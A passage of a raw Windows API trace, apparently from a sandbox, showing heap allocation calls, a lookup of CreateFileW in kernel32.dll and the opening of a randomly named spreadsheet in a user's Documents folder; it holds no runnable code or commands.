Size=0x10) returned 0x43ca370 [0077.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0077.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.638] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.641] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0077.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0077.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca6a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0077.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.642] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0077.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0077.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0077.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0077.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0077.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ooKroY8WpRTqCJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ookroy8wprtqcj.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0077.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.645] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.646] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 